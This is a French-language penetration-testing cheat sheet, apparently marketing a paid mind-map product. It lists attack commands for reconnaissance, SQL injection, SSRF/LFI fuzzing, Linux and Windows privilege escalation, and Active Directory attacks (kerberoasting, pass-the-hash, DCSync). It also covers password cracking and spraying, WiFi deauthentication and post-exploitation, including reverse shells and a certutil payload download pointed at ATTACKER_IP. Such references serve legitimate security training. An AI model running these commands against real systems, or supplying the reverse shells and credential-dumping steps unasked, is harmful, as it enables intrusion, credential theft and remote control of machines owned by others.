# Reconnaissance
La collecte d'informations est la base de tout test d'intrusion. Commencez par la recon passive, puis passez au scan actif.
Nmap — Découverte réseau
nmap -sC -sV -oA scan_results TARGET_IP
nmap -p- -T4 --min-rate=1000 TARGET_IP
nmap -sU --top-ports 200 TARGET_IP
nmap --script vuln TARGET_IP
Énumération de sous-domaines & DNS
subfinder -d TARGET_DOMAIN -o subdomains.txt
amass enum -d TARGET_DOMAIN -o amass_results.txt
dig axfr @DNS_SERVER TARGET_DOMAIN
Brute-force de répertoires & fichiers
feroxbuster -u https://TARGET -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -x php,html,js
gobuster dir -u https://TARGET -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50
# Hacking d'Applications Web
Testez les vulnérabilités du Top 10 OWASP : SQLi, XSS, SSRF, IDOR, contournement d'authentification, et plus.
Injection SQL
sqlmap -u "https://TARGET/page?id=1" --dbs --batch
sqlmap -u "https://TARGET/page?id=1" -D dbname --tables --batch
sqlmap -r request.txt --level 5 --risk 3 --batch
XSS (Cross-Site Scripting)
dalfox url "https://TARGET/search?q=FUZZ" -b YOUR_CALLBACK
SSRF & LFI
ffuf -u "https://TARGET/fetch?url=FUZZ" -w /usr/share/seclists/Discovery/Web-Content/ssrf.txt -mr "root:"
ffuf -u "https://TARGET/page?file=FUZZ" -w /usr/share/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt -fc 404
Burp Suite — Essentiels
curl -x http://127.0.0.1:8080 -k https://TARGET
# Services Réseau
Protocoles et services courants lors des tests d'intrusion : SMB, FTP, SSH, HTTP, SNMP.
Énumération SMB
smbclient -L //TARGET_IP -N
enum4linux -a TARGET_IP
crackmapexec smb TARGET_IP -u '' -p '' --shares
FTP
ftp TARGET_IP # Essayer anonymous:anonymous
SNMP
snmpwalk -v2c -c public TARGET_IP
# Escalade de Privilèges Linux
Après avoir obtenu un shell, escaladez vers root. Vérifiez les SUID, capabilities, cron jobs et exploits kernel.
Scripts d'énumération
curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh
Binaires SUID
find / -perm -4000 -type f 2>/dev/null
Capabilities
getcap -r / 2>/dev/null
Tâches Cron
cat /etc/crontab && ls -la /etc/cron.* && crontab -l
Mauvaise configuration Sudo
sudo -l
/etc/passwd inscriptible
openssl passwd -1 -salt hacker password123
# Escalade de Privilèges Windows
Escaladez d'un utilisateur bas privilège à SYSTEM. Impersonation de tokens, abus de services, chemins non-quotés.
Énumération
winPEASany.exe quiet fast searchfast
whoami /priv
Impersonation de Token
.\GodPotato.exe -cmd "cmd /c whoami"
Chemins de service non-quotés
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows"
# Active Directory
Pentesting AD : énumérer les utilisateurs, kerberoast, AS-REP roast, pass-the-hash, DCSync.
Énumération
bloodhound-python -c All -d DOMAIN.LOCAL -u USER -p PASS -ns DC_IP
ldapsearch -x -H ldap://DC_IP -D "USER@DOMAIN" -w PASS -b "DC=domain,DC=local" "(objectClass=user)" sAMAccountName
Kerberoasting
impacket-GetUserSPNs DOMAIN/USER:PASS -dc-ip DC_IP -request -outputfile kerberoast.txt
AS-REP Roasting
impacket-GetNPUsers DOMAIN/ -usersfile users.txt -dc-ip DC_IP -no-pass -outputfile asrep.txt
Pass-the-Hash
impacket-psexec DOMAIN/USER@TARGET_IP -hashes :NTLM_HASH
DCSync
impacket-secretsdump DOMAIN/USER:PASS@DC_IP -just-dc-ntlm
# Attaques de Mots de Passe
Cracker des hashes, brute-forcer des services, et pulvériser des identifiants sur le réseau.
Cracking de hashes
hashcat -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt --rules-file /usr/share/hashcat/rules/best64.rule
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
Brute-force en ligne
hydra -l admin -P /usr/share/wordlists/rockyou.txt TARGET_IP ssh -t 4
Password Spraying
crackmapexec smb TARGET_IP -u users.txt -p 'Season2026!' --continue-on-success
# Post-Exploitation
Après avoir obtenu l'accès : établir la persistance, pivoter, exfiltrer les données.
Transfert de fichiers
python3 -m http.server 8080
certutil -urlcache -split -f http://ATTACKER_IP:8080/file.exe C:\Temp\file.exe
Reverse Shells
bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1
python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("ATTACKER_IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
Upgrade de shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
Pivoting
chisel server -p 8000 --reverse # Sur l'attaquant
chisel client ATTACKER_IP:8000 R:socks # Sur la cible
# Attaques Sans-fil
Pentesting WiFi : capturer des handshakes, cracker du WPA2, points d'accès pirates.
airmon-ng start wlan0
airodump-ng wlan0mon
airodump-ng -c CHANNEL --bssid BSSID -w capture wlan0mon
aireplay-ng -0 5 -a BSSID wlan0mon
aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap
# Cloud & Kubernetes
Énumérer les assets cloud, exploiter les mauvaises configurations AWS, Azure, GCP et Kubernetes.
AWS
aws sts get-caller-identity
aws s3 ls s3://BUCKET_NAME --no-sign-request
Kubernetes
kubectl get pods --all-namespaces
kubectl auth can-i --list
📚 Ressources Complémentaires
- Glossaire Pentesting — 60+ termes de cybersécurité expliqués pour les hackers éthiques
- Guide : Débuter en Pentesting — Guide pas à pas avec méthodologie et outils
Envie de 11 600+ commandes dans une mindmap interactive ?
Cet aide-mémoire ne montre qu'une fraction de ce que Pentest Mindmap offre. 32 catégories, recherche instantanée et copie en 1 clic — organisé en carte mentale interactive.
Essai Gratuit 7 Jours →